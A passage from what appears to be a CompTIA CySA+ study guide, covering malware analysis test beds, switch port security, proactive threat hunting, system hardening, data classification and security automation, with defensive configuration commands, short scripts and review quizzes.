executed in a sandbox.
In many cases, sandboxing tools operate by sending a file
to a special server that analyzes the file and sends you a
report on it. Sometimes this is a free service, but in many
instances it is not. Some examples of these services
include the following:
• Sandboxie
• Akana
• Binary Guard True Bare Metal
• BitBlaze Malware Analysis Service
• Comodo Automated Analysis System and Valkyrie
• Deepviz Malware Analyzer
• Detux Sandbox (Linux binaries)
Another option for studying malware is to set up a
“sheep dip” computer. This is a system that has been
isolated from the other systems and is used for analyzing
suspect files and messages for malware. You can take
measures such as the following on a sheep dip system:
• Install port monitors to discover ports used by the
malware.
• Install file monitors to discover what changes may
be made to files.
• Install network monitors to identify what
communications the malware may attempt.
• Install one or more antivirus programs to perform
malware analysis.
Often these sheep dip systems are combined with
antivirus sensor systems to which malicious traffic is
reflected for analysis. The safest way to perform reverse
engineering and malware analysis is to prepare a test
bed. Doing so involves the following steps:
Step 1. Install virtualization software on the host.
Step 2. Create a VM and install a guest operating
system on the VM.
Step 3. Isolate the system from the network by
ensuring that the NIC is set to host-only
mode.
Step 4. Disable shared folders and enable guest
isolation on the VM.
Step 5. Copy the malware to the guest operating
system.
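As a hedged sketch of Steps 3 and 4 using VirtualBox's command-line tool (the VM name, shared folder name, and adapter name are hypothetical), you might run:

# Attach the VM's NIC to a host-only network so it cannot reach the LAN
VBoxManage modifyvm "MalwareLab" --nic1 hostonly --hostonlyadapter1 vboxnet0
# Remove any shared folder (assuming one named "shared" exists)
VBoxManage sharedfolder remove "MalwareLab" --name "shared"
# Snapshot the clean state so the machine can be wiped and rebuilt quickly
VBoxManage snapshot "MalwareLab" take "clean-baseline"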
Also, you need isolated network services for the VM,
such as DNS. It may also be beneficial to install multiple
operating systems in both patched and unpatched
configurations. Finally, you can make use of
virtualization snapshots and reimaging tools to wipe and
rebuild machines quickly. Once the test bed is set up, you
also need to install a number of other tools to use on the
isolated VM, including the following:
• Imaging tools: You need these tools to take
images for forensics and prosecution procedures.
Examples include SafeBack Version 2.0 and Linux
dd.
• File/data analysis tools: You need these tools
to perform static analysis of potential malware
files. Examples include PeStudio and PEframe.
• Registry/configuration tools: You need these
tools to help identify infected settings in the
registry and to identify the last-saved settings.
Examples include Microsoft’s Sysinternals
Autoruns and Silent Runners.vbs.
• Sandbox tools: You need these tools for manual
malware analysis in a safe environment.
• Log analyzers: You need these tools to extract
log files. Examples include AWStats and Apache
Log Viewer.
• Network capture tools: You need these tools to
understand how the malware uses the network.
Examples include Wireshark and Omnipeek.
While the use of virtual machines to investigate the
effects of malware is quite common, you should know
that some well-written malware can break out of a VM
relatively easily, making this approach problematic.
PORT SECURITY
Port security applies to ports on a switch or wireless
home router, and because it relies on monitoring the
MAC addresses of the devices attached to the switch
ports, it is considered to be Layer 2 security. While
disabling any ports that are not in use is always a good
idea, port security goes a step further and allows you to
keep a port enabled for legitimate devices while
preventing its use by illegitimate devices. You can apply
two types of restrictions to a switch port:
• Restrict the specific MAC addresses allowed to
send on the port.
• Restrict the total number of different MAC
addresses allowed to send on the port.
By specifying which specific MAC addresses are allowed
to send on a port, you can prevent unknown devices from
connecting to the switch port. Port security is applied at
the interface level. The interface must be configured as
an access port, so first you ensure that it is by executing
the following command:
Switch(config)# int fa0/1
Switch(config-if)# switchport mode access
In order for port security to function, you must enable
the feature. To enable it on a switchport, use the
following command at the interface configuration
prompt:
Switch(config-if)# switchport port-security
Limiting MAC Addresses
Now you need to define the maximum number of MAC
addresses allowed on the port. In many cases today, IP
phones and computers share a switchport (the computer
plugs into the phone, and the phone plugs into the
switch), so here you want to allow a maximum of two:
Switch(config-if)# switchport port-security maximum 2
Next, you define the two allowed MAC addresses, in this
case, aaaa.aaaa.aaaa and bbbb.bbbb.bbbb:
Switch(config-if)# switchport port-security mac-address aaaa.aaaa.aaaa
Switch(config-if)# switchport port-security mac-address bbbb.bbbb.bbbb
Finally, you set an action for the switch to take if there is
a violation. By default, the action is to shut down the
port. You can also set it to restrict, which doesn’t shut
down the port but prevents the violating device from
sending any data. In this case, set it to restrict:
Switch(config-if)# switchport port-security violation restrict
Now you have secured the port to allow only the two
MAC addresses required by the legitimate user: one for
his phone and the other for his computer. Now you just
need to gather all the MAC addresses for all the phones
and computers, and you can lock down all the ports. Boy,
that’s a lot of work! In the next section, you’ll see that
there is an easier way.
Implementing Sticky MAC
Sticky MAC is a feature that allows a switch to learn
the MAC addresses of the devices currently connected to
the port and convert them to secure MAC addresses (the
only MAC addresses allowed to send on the port). All you
need to do is specify the keyword sticky in the command
where you designate the MAC addresses, and you’re
done. You still define the maximum number, and Sticky
MAC converts up to that number of addresses to secure
MAC addresses. Therefore, you can secure all ports by
only specifying the number allowed on each port and
specifying the sticky keyword in the switchport port-security
mac-address command. To secure a single port,
execute the following code:
Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security maximum 2
Switch(config-if)# switchport port-security mac-address sticky
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 12-5 lists a reference of these key topics and the
page numbers on which each is found.
Table 12-5 Key Topics
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
permissions
rights
whitelisting
blacklisting
firewalls
next-generation firewalls (NGFWs)
host-based firewall
data loss prevention (DLP)
endpoint detection and response (EDR)
network access control (NAC)
802.1X
supplicant
authenticator
authentication server
sinkhole
port security
sticky MAC
REVIEW QUESTIONS
1. Granting someone the ability to reset passwords is
the assignment of a(n) ________.
2. List at least one disadvantage of packet filtering
firewalls.
3. Match the following terms with their definitions.
4. List at least two advantages of circuit-level proxies.
5. ___________________ is installed at network
egress points near the perimeter, to prevent data
exfiltration.
6. Match the following terms with their definitions.
7. List at least two disadvantages of RADIUS.
8. _______________ is a system that has been
isolated from the other systems and is used for
analyzing suspect files and messages for malware.
9. Match the following terms with their definitions.
10. List at least two measures that should be taken with
sheep dip systems.
Chapter 13. The
Importance of Proactive
Threat Hunting
This chapter covers the following topics related
to Objective 3.3 (Explain the importance of
proactive threat hunting) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Establishing a hypothesis: Discusses the
importance of this first step in threat hunting
• Profiling threat actors and activities: Covers
the process and its application
• Threat hunting tactics: Describes hunting
techniques, including executable process analysis
• Reducing the attack surface area: Identifies
what constitutes the attack surface
• Bundling critical assets: Discusses the
reasoning behind this technique
• Attack vectors: Defines various attack vectors
• Integrated intelligence: Describes a technology
that addresses the need for shared intelligence
• Improving detection capabilities: Identifies
methods for improving detection
Threat hunting is a security approach that places
emphasis on actively searching for threats rather than
sitting back and waiting to react. It is sometimes referred
to as offensive in nature rather than defensive. This
chapter explores threat hunting and details what it
involves.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these eight self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 13-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 13-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is the first step in the
scientific method?
a. Ask a question.
b. Conduct an experiment.
c. Make a conclusion.
d. Establish a hypothesis.
2. The U.S. Federal Bureau of Investigation (FBI) has
identified all but which of the following categories
of threat actors?
a. Hacktivists
b. Organized crime
c. State sponsors
d. Terrorist groups
3. Which of the following might identify a device that
has been compromised with malware?
a. Executable process analysis
b. Regression analysis
c. Risk management
d. Polyinstantiation
4. Which of the following allows you to prevent any
changes to the device configuration, even by users
who formerly had the right to configure the device?
a. Configuration lockdown
b. System hardening
c. NAC
d. DNSSec
5. Which of the following is a measure of how freely
data can be handled?
a. Transparency
b. Sensitivity
c. Value
d. Quality
6. Which metric included in the CVSS Attack Vector
metric group means that the attacker can exploit the
vulnerability from any network?
a. B
b. N
c. L
d. A
7. Which of the following focuses on merging
cybersecurity and physical security to aid
governments in dealing with emerging threats?
a. OWASP
b. NIST
c. IIC
d. PDA
8. In which step of Deming’s Plan–Do–Check–Act
cycle are the results of the implementation
analyzed to determine whether it made a
difference?
a. Plan
b. Do
c. Check
d. Act
FOUNDATION TOPICS
ESTABLISHING A
HYPOTHESIS
The first phase of proactive threat hunting is to establish
a hypothesis about the aims and nature of a potential
attack, similar to establishing a hypothesis when
following the scientific method, shown in Figure 13-1.
When security incidents are occurring, and even when
they are not occurring at the current time, security
professionals must anticipate attacks and establish a
hypothesis regarding the attack aims and method as
soon as possible. As you may already know from the
scientific method, making an educated guess about the
aims and nature of an attack is the first step. Then you
conduct experiments (or gather more network data) to
either prove or disprove the hypothesis. Then the process
starts again with a new hypothesis if the old one has been
disproved.
Figure 13-1 Scientific Method
For example, if an attacker is probing your network for
unknown reasons, you might follow the method in this
way:
1. Why is he doing this? What is his aim?
2. He is trying to perform a port scan.
3. Monitor and capture the traffic he sends to the
network.
4. Look for the presence of packets that have been
crafted by the hacker compared to those that are
the result of the normal TCP three-way handshake.
5. These packet types are not present; therefore, his
intent is not to port scan.
At this point another hypothesis will be suggested and
the process begins again.
PROFILING THREAT ACTORS
AND ACTIVITIES
A threat is carried out by a threat actor. For example, an
attacker who takes advantage of an inappropriate or
absent ACL is a threat actor. Keep in mind, though, that
threat actors can discover and/or exploit
vulnerabilities. Not all threat actors will actually exploit
an identified vulnerability. While you learned about basic
threat actors in Chapter 1, “The Importance of Threat
Data and Intelligence,” the U.S. Federal Bureau of
Investigation (FBI) has identified three categories of
threat actors:
• Organized crime groups primarily threatening the
financial services sector and expanding the scope
of their attacks
• State sponsors or advanced persistent threats
(APTs), usually foreign governments, interested in
pilfering data, including intellectual property and
research and development data from major
manufacturers, government agencies, and defense
contractors
• Terrorist groups that want to impact countries by
using the Internet and other networks to disrupt
or harm the viability of a society by damaging its
critical infrastructure
While there are other, less organized groups out there,
law enforcement considers these three groups to be the
primary threat actors. However, organizations should
not totally disregard the threats of any threat actors that
fall outside these three categories. Lone actors or smaller
groups that use hacking as a means to discover and
exploit any discovered vulnerability can cause damage
just like the larger, more organized groups.
Hacker and cracker are two terms that are often used
interchangeably in media but do not actually have the
same meaning. Hackers are individuals who attempt to
break into secure systems to obtain knowledge about the
systems and possibly use that knowledge to carry out
pranks or commit crimes. Crackers, on the other hand,
are individuals who attempt to break into secure systems
with the intent of using the knowledge gained for nefarious
purposes. Hacktivists are a newer group to crop
up. They are activists for a cause, such as animal rights,
who use hacking as a means to get their message out and
affect the businesses that they feel are detrimental to
their cause.
In the security world, the terms white hat, gray hat, and
black hat are more easily understood and less often
confused than the terms hackers and crackers. A white
hat does not have any malicious intent. A black hat has
malicious intent. A gray hat is somewhere between the
other two. A gray hat may, for example, break into a
system, notify the administrator of the security hole, and
offer to fix the security issues for a fee. Threat actors use
a variety of techniques to gather the information
required to gain a foothold.
THREAT HUNTING TACTICS
Security analysts use various techniques in the process of
anticipating and identifying threats. Some of these
methods revolve around network surveillance and others
involve examining the behaviors of individual systems.
Hunt Teaming
Hunt teaming is a new approach to security that is
offensive in nature rather than defensive, which has been
the common approach of security teams in the past.
Hunt teams work together to detect, identify, and
understand advanced and determined threat actors.
Hunt teaming is covered in Chapter 8, “Security
Solutions for Infrastructure Management.”
Threat Model
A threat model is a conceptual design that attempts to
provide a framework on which to implement security
efforts. Many models have been created. Let’s say, for
example, that you have an online banking application
and need to assess the points at which the application
faces threats. Figure 13-2 shows how a threat model in
the form of a data flow diagram might be created using
the Open Web Application Security Project (OWASP)
approach to identify where the trust boundaries are
located.
Figure 13-2 OWASP Threat Model
Threat modeling tools go beyond these simple data flow
diagrams. The following are some recent tools:
• Threat Modeling Tool (formerly SDL Threat
Modeling Tool) identifies threats based on the
STRIDE threat classification scheme.
• ThreatModeler identifies threats based on a
customizable comprehensive threat library and is
intended for collaborative use across all
organizational stakeholders.
• IriusRisk offers both community and
commercial versions of a tool that focuses on the
creation and maintenance of a live threat model
through the entire software development life cycle
(SDLC). It connects with several different tools to
empower automation.
• securiCAD focuses on threat modeling of IT
infrastructures using a computer-aided design
(CAD) approach where assets are automatically or
manually placed on a drawing pane.
• SD Elements is a software security requirements
management platform that includes automated
threat modeling capabilities.
Executable Process Analysis
When the processor is very busy with very little or
nothing running to generate the activity, it could be a
sign that the processor is working on behalf of malicious
software. This is one of the key reasons any compromise
is typically accompanied by a drop in performance.
Executable process analysis allows you to
determine this. While Task Manager in Windows is
designed to help with this, it has some limitations. For
one, when you are attempting to use it, you are typically
already in a resource crunch, and it takes a bit to open.
Then when it does open, the CPU has settled back down,
and you have no way of knowing what caused it.
By using Task Manager, you can determine what process
is causing a bottleneck at the CPU. For example, Figure
13-3 shows that in Task Manager, you can click the
Processes tab and then click the CPU column to sort the
processes with the top CPU users at the top. In Figure 13-3, the top user is Task Manager, which makes sense since
it was just opened.
Figure 13-3 Task Manager
A better tool to use is the Sysinternals suite, which is a free
download at https://docs.microsoft.com/sysinternals/.
The specific part of this suite you need is Process
Explorer, which enables you to see in the Notification
area the top CPU offender, without requiring you to open
Task Manager. Moreover, Process Explorer enables you
to look at the graph that appears in Task Manager and
identify what caused spikes in the past, which is not
possible with Task Manager alone. In Figure 13-4, you
can see that Process Explorer breaks down each process
into its subprocesses.
Figure 13-4 Process Explorer
An example of using Task Manager for threat hunting is
to proactively look at the dates and times when processor
usage is high even though system usage is typically
low, indicating that a malicious process may be at work.
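For scripted hunting, a short sketch in Python (assuming the third-party psutil package is installed) can snapshot the top CPU consumers on a schedule so spikes during quiet hours can be compared against a baseline:

import psutil

# Prime the per-process CPU counters, then wait a measurable interval.
for p in psutil.process_iter():
    try:
        p.cpu_percent(None)
    except psutil.Error:
        pass
psutil.cpu_percent(interval=1)

samples = []
for p in psutil.process_iter(['pid', 'name']):
    try:
        samples.append((p.cpu_percent(None), p.info['pid'], p.info['name']))
    except psutil.Error:
        pass

# Report the five busiest processes; unexplained entries merit investigation.
for cpu, pid, name in sorted(samples, reverse=True)[:5]:
    print(f"{cpu:5.1f}%  {pid:>6}  {name}")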
Memory Consumption
Another key indicator of a compromised host is
increased memory consumption. Many times it is an
indication that additional programs have been loaded
into RAM so they can be processed. Then once they are
loaded, they use RAM in the process of executing their
tasks, whatever they may be. You can monitor memory
consumption by using the same approach you use for
CPU consumption. If memory usage cannot be
accounted for, you should investigate it. (Review what
you learned about buffer overflows, which are attacks
that may display symptoms of increased memory
consumption.)
REDUCING THE ATTACK
SURFACE AREA
Reducing the attack surface area means limiting the
features and functions that are available to an attacker.
For example, if I lock all doors to the facility with the
exception of one, I have reduced the attack surface.
Another term for reducing the attack surface area is
system hardening because it involves ensuring that
all systems have been hardened to the extent that is
possible and still provide functionality.
System Hardening
Another of the ongoing goals of operations security is to
ensure that all systems have been hardened to the extent
that is possible and still provide functionality. System
hardening can be accomplished both on physical and on
logical bases. From a logical perspective:
• Remove unnecessary applications.
• Disable unnecessary services.
• Block unrequired ports.
• Tightly control the connecting of external storage
devices and media, if allowed at all.
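As a brief illustrative sketch on a Linux host (the package and service names here are assumptions for the example), these logical hardening steps might translate into commands such as:

# Remove an unnecessary application and disable an unnecessary service
apt-get -y remove telnetd
systemctl disable --now telnet.socket
# Block an unrequired port at the host firewall
ufw deny 23/tcp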
System hardening is also done at the physical layer.
Physical security was covered in Chapter 7, but some
examples include the following:
• Fences around the facility
• Locks on the doors
• Disabled USB ports
• Display filters
• Clean desk policy
Configuration Lockdown
Configuration lockdown (sometimes also called
system lockdown) is a setting that can be implemented
on devices including servers, routers, switches, firewalls,
and virtual hosts. You set it on a device after that device
is correctly configured, and it prevents any changes to
the configuration, even by users who formerly had the
right to configure the device. This setting helps support
change control.
Full tests for functionality of all services and applications
should be performed prior to implementing this setting.
Many products that provide this functionality offer a test
mode, in which you can log any problems the current
configuration causes without allowing the problems to
completely manifest on the network. This allows you to
identify and correct any problems prior to implementing
full lockdown.
BUNDLING CRITICAL
ASSETS
While organizations should strive to protect all assets, in
the cybersecurity world we tend to focus on what is at
risk in the cyber world, which is our data. Bundling these
critical digital assets helps to organize them so that
security controls can be applied more cleanly with fewer
possible human errors. Before bundling can be done,
data must be classified.
Data Classification Policy
Data should be classified based on its value to the
organization, its sensitivity to disclosure, and its
criticality. Assigning a value to data allows an
organization to determine the resources that should be
used to protect the data. Resources that are used to
protect data include personnel resources, monetary
resources, and access control resources. Classifying data
allows you to apply different protective measures. Data
classification is critical to all systems to protect the
confidentiality, integrity, and availability (CIA) of data.
After data is classified, the data can be segmented based
on the level of protection it needs. The classification
levels ensure that data is handled and protected in the
most cost-effective manner possible. An organization
should determine the classification levels it uses based
on the needs of the organization. A number of
commercial business and military and government
information classifications are commonly used. The
information life cycle should also be based on the
classification of the data. Organizations are required to
retain certain information, particularly financial data,
based on local, state, or government laws and
regulations.
Sensitivity and Criticality
Sensitivity is a measure of how freely data can be
handled. Some data requires special care and handling,
especially when inappropriate handling could result in
penalties, identity theft, financial loss, invasion of
privacy, or unauthorized access by an individual or many
individuals. Some data is also subject to regulation by
state or federal laws and requires notification in the
event of a disclosure. Data is assigned a level of
sensitivity based on who should have access to it and
how much harm would be done if it were disclosed.
Criticality is a measure of the importance of the data.
Data considered sensitive may not necessarily be
considered critical. Assigning a level of criticality to a
particular data set must take into consideration the
answer to a few questions:
• Will you be able to recover the data in case of
disaster?
• How long will it take to recover the data?
• What is the effect of this downtime, including loss
of public standing?
Data is considered critical when it is essential to the
organization’s business. When essential data is not
available, even for a brief period of time, or its integrity is
questionable, the organization is unable to function.
Data is considered required but not critical when it is
important to the organization but organizational
operations can continue for a predetermined period of
time even if the data is not available. Data is considered
nonessential if the organization is able to operate
without it during extended periods of time.
Commercial Business Classifications
Commercial businesses usually classify data using four
main classification levels, listed here from highest
sensitivity level to lowest:
1. Confidential
2. Private
3. Sensitive
4. Public
Data that is confidential includes trade secrets,
intellectual property, application programming code, and
other data that could seriously affect the organization if
unauthorized disclosure occurred. Data at this level
would only be available to personnel in the organization
whose work relates to the data’s subject. Access to
confidential data usually requires authorization for each
access. In the United States, confidential data is exempt
from disclosure under the Freedom of Information Act.
In most cases, the only way for external entities to have
authorized access to confidential data is as follows:
• After signing a confidentiality agreement
• When complying with a court order
• As part of a government project or contract
procurement agreement
Data that is private includes any information related to
personnel, including human resources records, medical
records, and salary information, that is used only within
the organization. Data that is sensitive includes
organizational financial information and requires extra
measures to ensure its CIA and accuracy. Public data is
data whose disclosure would not cause a negative impact
on the organization.
Military and Government
Classifications
Military and government entities usually classify data
using five main classification levels, listed here from
highest sensitivity level to lowest:
1. Top secret: Data that is top secret includes
weapon blueprints, technology specifications, spy
satellite information, and other military
information that could gravely damage national
security if disclosed.
2. Secret: Data that is secret includes deployment
plans, missile placement, and other information
that could seriously damage national security if
disclosed.
3. Confidential: Data that is confidential includes
patents, trade secrets, and other information that
could seriously affect the government if
unauthorized disclosure occurred.
4. Sensitive but unclassified: Data that is
sensitive but unclassified includes medical or other
personal data that might not cause serious damage
to national security but could cause citizens to
question the reputation of the government.
5. Unclassified: Military and government
information that does not fall into any of the other
four categories is considered unclassified and
usually must be released to the public when requested under the
Freedom of Information Act.
Distribution of Critical Assets
One strategy that can help support resiliency is to ensure
that critical assets are not all located in the same physical
location. Collocating critical assets leaves your
organization open to the kind of nightmare that occurred
in 2017 at the Atlanta airport. When a fire took out the
main and backup power systems (which were located
together), the busiest airport in the world went dark for
over 12 hours. Distribution of critical assets certainly
enhances resilience.
ATTACK VECTORS
An attack vector is a segment of the communication
path that an attack uses to access a vulnerability. Each
attack vector can be thought of as comprising a source of
malicious content, a potentially vulnerable processor of
that malicious content, and the nature of the malicious
content itself.
Recall from Chapter 2, “Utilizing Threat Intelligence to
Support Organizational Security,” that the Common
Vulnerability Scoring System (CVSS) has as part of its
Base metric group a metric called Attack Vector (AV). AV
describes how the attacker would exploit the
vulnerability and has four possible values:
• L: Stands for Local and means that the attacker
must have physical or logical access to the affected
system.
• A: Stands for Adjacent network and means that
the attacker must be on the local network.
• N: Stands for Network and means that the
attacker can exploit the vulnerability from any
network.
• P: Stands for Physical and requires the attacker to
physically touch or manipulate the vulnerable
component.
Analysts can use the accumulated CVSS information
regarding attacks to match current characteristics of
indicators of compromise to common attacks.
INTEGRATED INTELLIGENCE
Integrated intelligence refers to the consideration
and analysis of intelligence data from a perspective that
combines multiple data sources and attempts to make
inferences based on this data integration. Many vendors
of security software and appliances often tout the
intelligence integration capabilities of their products.
SIEM systems are a good example, as described in
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
The Integrated Intelligence Center (IIC) is a unit at the
Center for Internet Security (CIS) that focuses on
merging cybersecurity and physical security to aid
governments in dealing with emerging threats. IIC
attempts to create predictive models using the multiple
data sources at its disposal.
IMPROVING DETECTION
CAPABILITIES
Detection of events and incidents as they occur is critical.
Organizations should be constantly trying to improve
their detection capabilities.
Continuous Improvement
Security professionals can never just sit back, relax, and
enjoy the ride. Security needs are always changing
because the “bad guys” never take a day off. It is
therefore vital that security professionals continuously
work to improve their organization’s security. Tied into
this is the need to improve the quality of the security
controls currently implemented. Quality improvement
commonly uses a four-step quality model, known as
Deming’s Plan–Do–Check–Act cycle, the steps for which
are as follows:
1. Plan: Identify an area for improvement and make a
formal plan to implement it.
2. Do: Implement the plan on a small scale.
3. Check: Analyze the results of the implementation
to determine whether it made a difference.
4. Act: If the implementation made a positive change,
implement it on a wider scale. Continuously
analyze the results.
This can’t be done without establishing some metrics to
determine how successful you are now.
Continuous Monitoring
Any logging and monitoring activities should be part of
an organizational continuous monitoring program. The
continuous monitoring program must be designed to
meet the needs of the organization and implemented
correctly to ensure that the organization’s critical
infrastructure is guarded. Organizations may want to
look into Continuous Monitoring as a Service (CMaaS)
solutions deployed by cloud service providers.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 13-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 13-2 Key Topics in Chapter 13
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
threat actors
hacker
cracker
hunt teaming
threat model
executable process analysis
Process Explorer
system hardening
configuration lockdown
sensitivity
criticality
attack vector
integrated intelligence
REVIEW QUESTIONS
1. Place the following steps of the scientific method in
order.
2. List and describe at least one threat modeling tool.
3. ____________________ allows you to
determine when a CPU is struggling with malware.
4. Match the following terms with their definitions.
5. List the military/government data classification
levels in order.
6. A(n) _____________________ is a segment of
the communication path that an attack uses to
access a vulnerability.
7. Match the following terms with their definitions.
8. List at least two hardening techniques.
9. Data should be classified based on its
_____________ to the organization and its
____________ to disclosure.
10. Match the following terms with their definitions.
Chapter 14. Automation
Concepts and
Technologies
This chapter covers the following topics related
to Objective 3.4 (Compare and contrast
automation concepts and technologies) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification exam:
• Workflow orchestration: Describes the
process of Security Orchestration, Automation,
and Response (SOAR) and its role in security
• Scripting: Reviews the scripting process and its
role in automation
• Application programming interface (API)
integration: Describes how this process provides
access to an application’s internal functions
through an API
• Automated malware signature creation:
Identifies an automated process of malware
identification
• Data enrichment: Discusses processes used to
enhance, refine, or otherwise improve raw data
• Threat feed combination: Defines a process
for making use of data from multiple intelligence
feeds
• Machine learning: Describes the role machine
learning plays in automated security
• Use of automation protocols and
standards: Identifies various protocols and
standards, including Security Content Automation
Protocol (SCAP), and their application
• Continuous integration: Covers the process of
ongoing integration of software components
during development
• Continuous deployment/delivery: Covers the
process of ongoing review and upgrade of
software
Traditionally, network operations and threat intelligence
activities were performed manually by technicians.
Increasingly in today’s environments, these processes are
being automated through the use of scripting and other
automation tools. This chapter explores how workflows
can be automated.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these ten self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 14-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 14-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following enables you to automate the
response to a security issue? (Choose the best
answer.)
a. Orchestration
b. Piping
c. Scripting
d. Virtualization
2. Which scripting language is used to work in the
Linux interface?
a. Python
b. Bash
c. Ruby
d. Perl
3. Which of the following is used to provide
integration between your website and a payment
gateway?
a. Perl
b. Orchestration
c. API
d. Scripting
4. Which of the following is an additional method of
identifying malware?
a. DHCP snooping
b. DAI
c. Automated malware signature creation
d. Piping
5. When you receive bulk e-mail from a vendor and it
refers to you by first name, what technique is in
use?
a. Scripting
b. Orchestration
c. Heuristics
d. Data enrichment
6. Threat feeds inform the recipient about all but
which of the following?
a. Presence of malware on the recipient
b. Suspicious domains
c. Lists of known malware hashes
d. IP addresses associated with malicious activity
7. Which of the following is an example of machine
learning?
a. NAC
b. AEG
c. EDR
d. DLP
8. Which of the following is a standard that the
security automation community uses to enumerate
software flaws and configuration issues?
a. NAC
b. DAC
c. SCAP
d. DLP
9. Which of the following is a software development
practice whereby the work of multiple individuals
is combined a number of times a day?
a. Sinkholing
b. Continuous integration
c. Aggregation
d. Inference
10. Which of the following is considered the next
generation of DevOps and attempts to make sure
that software developers can release new product
changes to customers quickly in a sustainable way?
a. Agile
b. DevSecOps
c. Continuous deployment/delivery
d. Scrum
FOUNDATION TOPICS
WORKFLOW
ORCHESTRATION
Workflow orchestration is the sequencing of events
based on certain parameters by using scripting and
scripting tools. Over time orchestration has been
increasingly used to automate processes that were
formerly carried out manually by humans.
In virtualization, it is quite common to use orchestration.
For example, in the VMware world, technicians can
create what are called vApps, groups of virtual machines
that are managed and orchestrated as a unit to provide a
service to users. Using orchestration tools, you can set
one device to always boot before another device. For
example, in an Windows Active Directory environment,
you may need the domain controller (DC) to boot up
before the database server so that the database server
can property authenticate to the DC and function
correctly.
Figure 14-1 shows another, more complex automated
workflow orchestration using VMware vCloud
Automation Center (vCAC).
Figure 14-1 Workflow Orchestration
The workflow is sequenced to occur in the following
fashion:
1. A request comes in to write to the disk.
2. The disk space is checked.
3. Insufficient space is found.
4. A change request is generated for more space.
5. A disk is added.
6. The configuration database is updated.
7. The user is notified.
While this is one use of workflow orchestration, it can
also be used in the security world. Examples include
• Dynamic incident response plans that adapt in
real time
• Automated workflows to empower analysts and
enable faster response
SCRIPTING
Scripting languages and scripting tools are used to
automate a process. Common scripting languages
include
• bash: Used to work in the Linux interface
• Node.js: Framework to write network
applications using JavaScript
• Ruby: Great for web development
• Python: Supports procedure-oriented
programming and object-oriented programming
• Perl: Found on all Linux servers, helps in text
manipulation tasks
• Windows PowerShell: Found on all Windows
servers
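As a minimal sketch of security scripting (the directory path and hash value are hypothetical; real hash lists would come from a threat feed), a few lines of Python can sweep a directory for files matching known-malware hashes:

import hashlib
from pathlib import Path

# Hypothetical set of known-bad SHA-256 hashes
KNOWN_BAD = {"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}

for path in Path("/srv/uploads").rglob("*"):
    if path.is_file():
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        if digest in KNOWN_BAD:
            print(f"ALERT: {path} matches a known-malware hash")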
Scripting tools that require less knowledge of the actual
syntax of the language can also be used, such as
• Puppet
• Chef
• Ansible
For example, Figure 14-2 shows Puppet being used to
automate the update of Apache servers.
Figure 14-2 Puppet Orchestration
APPLICATION
PROGRAMMING INTERFACE
(API) INTEGRATION
As a review, an API is a set of clearly defined methods of
communication between various software components.
As such, you should think of an API as a connection
point that requires security consideration. For example,
an API between your e-commerce site and a payment
gateway must be secure. So, what is API integration and
why is it important?
API integration means that the applications on either
end of the API are synchronized and protect the
integrity of the information that passes across the API. It
also enables the proper updating and versioning required
in many environments. The term also describes the
relationship between a website and an API when the API
is integrated into the website.
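As an illustrative sketch only (the endpoint, credentials, and signature scheme are hypothetical rather than any specific gateway's API), an integration might sign each request body so the receiving side can verify its integrity:

import hmac
import hashlib
import json
import requests  # third-party HTTP library

API_KEY = "example-key"            # hypothetical credentials
SECRET = b"example-shared-secret"

payload = json.dumps({"order_id": 1234, "amount_cents": 5000})
# An HMAC-SHA256 over the body lets the gateway detect tampering in transit
signature = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()

resp = requests.post(
    "https://gateway.example.com/v1/charges",   # hypothetical endpoint
    data=payload,
    headers={"X-Api-Key": API_KEY, "X-Signature": signature,
             "Content-Type": "application/json"},
    timeout=10,
)
print(resp.status_code)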
AUTOMATED MALWARE
SIGNATURE CREATION
Automated malware signature creation is an
additional method of identifying malware. The antivirus software monitors incoming
unknown files for the presence of malware and analyzes
each file based on both classifiers of file behavior and
classifiers of file content. The file is then assigned a
particular malware classification. Subsequently,
a malware signature is generated for the incoming
unknown file based on the particular malware
classification. This malware signature can be used by an
antivirus program as a part of the antivirus program’s
virus identification processes.
DATA ENRICHMENT
Data enrichment is a technique that allows one
process to gather information from another process or
source and then customize a response to a third source
using the data from the second process or source. When
you receive bulk e-mail from a vendor and it refers to you
by first name, that is an example of data enrichment in
use. In that case a file of email address is consult (second
process) and added to the response to you. Another
common data enrichment process would, for example,
correct likely misspellings or typographical errors in a
database by using precision algorithms designed for that
purpose. Another way in which data enrichment can
work is by extrapolating data.
This can create a privacy issue, which is one reason the
